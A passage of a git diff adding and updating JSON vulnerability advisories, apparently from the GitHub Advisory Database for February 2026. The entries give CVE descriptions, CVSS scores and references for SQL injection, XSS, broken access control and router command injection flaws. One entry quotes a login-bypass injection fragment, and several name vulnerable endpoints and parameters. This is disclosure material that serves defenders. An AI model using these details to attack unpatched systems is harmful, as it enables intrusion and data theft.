"https://plugins.trac.wordpress.org/browser/wp-event-aggregator/tags/1.8.7/includes/class-wp-event-aggregator-cpt.php#L567" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/tags/1.8.7/includes/class-wp-event-aggregator-cpt.php#L761" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/trunk/includes/class-wp-event-aggregator-cpt.php#L56" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/trunk/includes/class-wp-event-aggregator-cpt.php#L567" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/trunk/includes/class-wp-event-aggregator-cpt.php#L761" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3455440/wp-event-aggregator#file18" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/50d8f1e0-2022-4fe1-b384-ca762a032d3c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T09:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xfh9-f34g-8fm7/GHSA-xfh9-f34g-8fm7.json b/advisories/unreviewed/2026/02/GHSA-xfh9-f34g-8fm7/GHSA-xfh9-f34g-8fm7.json new file mode 100644 index 0000000000000..8de8d1276d583 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xfh9-f34g-8fm7/GHSA-xfh9-f34g-8fm7.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xfh9-f34g-8fm7", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2025-14592" + ], + "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.6 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that, under certain conditions could have allowed an authenticated user to perform unauthorized operations by submitting GraphQL mutations through the GLQL API endpoint.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14592" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3451435" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/583961" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json b/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json index 3462e4bacb012..f88adbd5be477 100644 --- a/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json +++ b/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xfjv-gcf8-3jqc", - "modified": "2026-02-06T09:30:28Z", + "modified": "2026-02-18T18:30:23Z", "published": "2026-02-06T09:30:28Z", "aliases": [ "CVE-2026-21626" ], "details": "Access control settings for forum post custom fields are not applied to the JSON output type, leading to an ACL violation vector an information disclosure", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-xfpq-772f-h5qw/GHSA-xfpq-772f-h5qw.json b/advisories/unreviewed/2026/02/GHSA-xfpq-772f-h5qw/GHSA-xfpq-772f-h5qw.json index 5b5a2229e34fc..8b2dee24e62f5 100644 --- a/advisories/unreviewed/2026/02/GHSA-xfpq-772f-h5qw/GHSA-xfpq-772f-h5qw.json +++ b/advisories/unreviewed/2026/02/GHSA-xfpq-772f-h5qw/GHSA-xfpq-772f-h5qw.json @@ -58,7 +58,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-xfv7-f3m9-5h58/GHSA-xfv7-f3m9-5h58.json b/advisories/unreviewed/2026/02/GHSA-xfv7-f3m9-5h58/GHSA-xfv7-f3m9-5h58.json new file mode 100644 index 0000000000000..6575115526aed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xfv7-f3m9-5h58/GHSA-xfv7-f3m9-5h58.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xfv7-f3m9-5h58", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-25003" + ], + "details": "Missing Authorization vulnerability in madalin.ungureanu Client Portal client-portal allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Client Portal: from n/a through <= 1.2.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25003" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/client-portal/vulnerability/wordpress-client-portal-plugin-1-2-1-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xfxj-2mg2-fwpr/GHSA-xfxj-2mg2-fwpr.json b/advisories/unreviewed/2026/02/GHSA-xfxj-2mg2-fwpr/GHSA-xfxj-2mg2-fwpr.json new file mode 100644 index 0000000000000..719ecc6eb88e3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xfxj-2mg2-fwpr/GHSA-xfxj-2mg2-fwpr.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xfxj-2mg2-fwpr", + "modified": "2026-02-13T21:31:37Z", + "published": "2026-02-13T21:31:37Z", + "aliases": [ + "CVE-2025-27941" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27941" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xfxm-p3px-phfr/GHSA-xfxm-p3px-phfr.json b/advisories/unreviewed/2026/02/GHSA-xfxm-p3px-phfr/GHSA-xfxm-p3px-phfr.json new file mode 100644 index 0000000000000..835c138965930 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xfxm-p3px-phfr/GHSA-xfxm-p3px-phfr.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xfxm-p3px-phfr", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2020-37156" + ], + "details": "BloodX 1.0 contains an authentication bypass vulnerability in login.php that allows attackers to access the dashboard without valid credentials. Attackers can exploit the vulnerability by sending a crafted payload with '=''or' parameters to bypass login authentication and gain unauthorized access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37156" + }, + { + "type": "WEB", + "url": "https://github.com/diveshlunker/BloodX" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47842" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/bloodx-authentication-bypass" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-288" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xgvq-3q42-wr4g/GHSA-xgvq-3q42-wr4g.json b/advisories/unreviewed/2026/02/GHSA-xgvq-3q42-wr4g/GHSA-xgvq-3q42-wr4g.json new file mode 100644 index 0000000000000..7c50124160162 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xgvq-3q42-wr4g/GHSA-xgvq-3q42-wr4g.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xgvq-3q42-wr4g", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-23549" + ], + "details": "Deserialization of Untrusted Data vulnerability in magepeopleteam WpEvently mage-eventpress allows Object Injection.This issue affects WpEvently: from n/a through <= 5.1.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23549" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/mage-eventpress/vulnerability/wordpress-wpevently-plugin-5-1-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xgwv-vx48-69hc/GHSA-xgwv-vx48-69hc.json b/advisories/unreviewed/2026/02/GHSA-xgwv-vx48-69hc/GHSA-xgwv-vx48-69hc.json new file mode 100644 index 0000000000000..877ed83397513 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xgwv-vx48-69hc/GHSA-xgwv-vx48-69hc.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xgwv-vx48-69hc", + "modified": "2026-02-13T15:30:26Z", + "published": "2026-02-13T15:30:26Z", + "aliases": [ + "CVE-2026-1619" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in Universal Software Inc. FlexCity/Kiosk allows Exploitation of Trusted Identifiers.This issue affects FlexCity/Kiosk: from 1.0 before 1.0.36.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1619" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0065" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T14:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xh3r-gpf9-2v95/GHSA-xh3r-gpf9-2v95.json b/advisories/unreviewed/2026/02/GHSA-xh3r-gpf9-2v95/GHSA-xh3r-gpf9-2v95.json new file mode 100644 index 0000000000000..df831cc4abc59 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xh3r-gpf9-2v95/GHSA-xh3r-gpf9-2v95.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xh3r-gpf9-2v95", + "modified": "2026-02-14T06:30:58Z", + "published": "2026-02-14T06:30:58Z", + "aliases": [ + "CVE-2026-0692" + ], + "details": "The BlueSnap Payment Gateway for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.3.0. This is due to the plugin relying on WooCommerce's `WC_Geolocation::get_ip_address()` function to validate IPN requests, which trusts user-controllable headers like X-Real-IP and X-Forwarded-For to determine the client IP address. This makes it possible for unauthenticated attackers to bypass IP allowlist restrictions by spoofing a whitelisted BlueSnap IP address and send forged IPN (Instant Payment Notification) data to manipulate order statuses (mark orders as paid, failed, refunded, or on-hold) without proper authorization.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0692" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/bluesnap-payment-gateway-for-woocommerce/tags/3.4.0/includes/class-wc-bluesnap-ipn-webhooks.php#L417" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/bluesnap-payment-gateway-for-woocommerce/trunk/includes/class-wc-bluesnap-ipn-webhooks.php#L417" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/dc676e18-c895-4f6a-bce9-1f92207af885?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T05:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xhwg-m969-356h/GHSA-xhwg-m969-356h.json b/advisories/unreviewed/2026/02/GHSA-xhwg-m969-356h/GHSA-xhwg-m969-356h.json new file mode 100644 index 0000000000000..e5677dbff891b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xhwg-m969-356h/GHSA-xhwg-m969-356h.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xhwg-m969-356h", + "modified": "2026-02-14T09:31:33Z", + "published": "2026-02-14T09:31:33Z", + "aliases": [ + "CVE-2026-2024" + ], + "details": "The PhotoStack Gallery plugin for WordPress is vulnerable to SQL Injection via the 'postid' parameter in all versions up to, and including, 0.4.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2024" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/photostack-gallery/trunk/photo_gallery.php#L108" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/photostack-gallery/trunk/photo_gallery.php#L113" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/photostack-gallery/trunk/photo_gallery.php#L142" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9232b77e-e23f-4e91-8ea3-5e740956f51e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T07:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xj2q-cpcq-554c/GHSA-xj2q-cpcq-554c.json b/advisories/unreviewed/2026/02/GHSA-xj2q-cpcq-554c/GHSA-xj2q-cpcq-554c.json new file mode 100644 index 0000000000000..a3a01f4e4df9c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xj2q-cpcq-554c/GHSA-xj2q-cpcq-554c.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj2q-cpcq-554c", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25414" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the ID parameter. Attackers can craft requests to the /manage/ips/appid/ endpoint with script payloads in the ID parameter to execute arbitrary JavaScript in victim browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25414" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-reflected-cross-site-scripting-via-id-parameter-appid" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xj5x-4c9j-jr89/GHSA-xj5x-4c9j-jr89.json b/advisories/unreviewed/2026/02/GHSA-xj5x-4c9j-jr89/GHSA-xj5x-4c9j-jr89.json new file mode 100644 index 0000000000000..e7bff5ad48ee1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xj5x-4c9j-jr89/GHSA-xj5x-4c9j-jr89.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj5x-4c9j-jr89", + "modified": "2026-02-20T03:31:39Z", + "published": "2026-02-20T03:31:39Z", + "aliases": [ + "CVE-2025-30412" + ], + "details": "Sensitive data disclosure and manipulation due to improper authentication. The following products are affected: Acronis Cyber Protect 16 (Linux, Windows) before build 39938, Acronis Cyber Protect 15 (Linux, Windows) before build 41800.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30412" + }, + { + "type": "WEB", + "url": "https://security-advisory.acronis.com/advisories/SEC-8598" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1390" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T01:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xj72-8cc7-64m7/GHSA-xj72-8cc7-64m7.json b/advisories/unreviewed/2026/02/GHSA-xj72-8cc7-64m7/GHSA-xj72-8cc7-64m7.json new file mode 100644 index 0000000000000..780ca66955f87 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xj72-8cc7-64m7/GHSA-xj72-8cc7-64m7.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj72-8cc7-64m7", + "modified": "2026-02-13T21:31:38Z", + "published": "2026-02-13T21:31:38Z", + "aliases": [ + "CVE-2025-36524" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36524" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xj75-c4vf-wp8x/GHSA-xj75-c4vf-wp8x.json b/advisories/unreviewed/2026/02/GHSA-xj75-c4vf-wp8x/GHSA-xj75-c4vf-wp8x.json new file mode 100644 index 0000000000000..538fbf1a7fabc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xj75-c4vf-wp8x/GHSA-xj75-c4vf-wp8x.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj75-c4vf-wp8x", + "modified": "2026-02-16T12:30:25Z", + "published": "2026-02-16T12:30:25Z", + "aliases": [ + "CVE-2026-2550" + ], + "details": "A vulnerability was found in EFM iptime A6004MX 14.18.2. Affected is the function commit_vpncli_file_upload of the file /cgi/timepro.cgi. The manipulation results in unrestricted upload. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2550" + }, + { + "type": "WEB", + "url": "https://github.com/LX-LX88/cve-new/issues/3" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346159" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346159" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.749986" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T10:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json b/advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json new file mode 100644 index 0000000000000..857d992cdfa7a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj75-gfvf-4g86", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-1272" + ], + "details": "The Linux Kernel lockdown mode for kernel versions starting on 6.12 and above for Fedora Linux has the lockdown mode disabled without any warning. This may allow an attacker to gain access to sensitive information such kernel memory mappings, I/O ports, BPF and kprobes. Additionally unsigned modules can be loaded, leading to execution of untrusted code breaking breaking any Secure Boot protection. This vulnerability affects only Fedora Linux.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1272" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:6966" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-1272" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2345615" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xj9r-5fj6-ggxg/GHSA-xj9r-5fj6-ggxg.json b/advisories/unreviewed/2026/02/GHSA-xj9r-5fj6-ggxg/GHSA-xj9r-5fj6-ggxg.json new file mode 100644 index 0000000000000..6c3f0e4cdefbb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xj9r-5fj6-ggxg/GHSA-xj9r-5fj6-ggxg.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj9r-5fj6-ggxg", + "modified": "2026-02-19T18:31:52Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25323" + ], + "details": "Missing Authorization vulnerability in MiKa OSM osm allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects OSM: from n/a through <= 6.1.12.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25323" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/osm/vulnerability/wordpress-osm-plugin-6-1-12-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xjfr-756p-4phv/GHSA-xjfr-756p-4phv.json b/advisories/unreviewed/2026/02/GHSA-xjfr-756p-4phv/GHSA-xjfr-756p-4phv.json new file mode 100644 index 0000000000000..cc3fd1a4470a1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xjfr-756p-4phv/GHSA-xjfr-756p-4phv.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xjfr-756p-4phv", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-23608" + ], + "details": "GFI MailEssentials AI versions prior to 22.4 contain a stored cross-site scripting vulnerability in the Mail Monitoring rule creation endpoint. An authenticated user can supply HTML/JavaScript in the JSON \\\"name\\\" field to /MailEssentials/pages/MailSecurity/MailMonitoring.aspx/Save, which is stored and later rendered in the management interface, allowing script execution in the context of a logged-in user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23608" + }, + { + "type": "WEB", + "url": "https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gfi-mailessentials-ai-email-management-mail-monitoring-rule-stored-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:24:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json b/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json new file mode 100644 index 0000000000000..9a34bbdf7d186 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xjrj-8prq-9366", + "modified": "2026-02-16T03:30:17Z", + "published": "2026-02-16T03:30:17Z", + "aliases": [ + "CVE-2026-2529" + ], + "details": "A security flaw has been discovered in Wavlink WL-WN579A3 up to 20210219. Affected by this issue is the function DeleteMac of the file /cgi-bin/wireless.cgi. The manipulation of the argument delete_list results in command injection. The attack can be executed remotely. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": 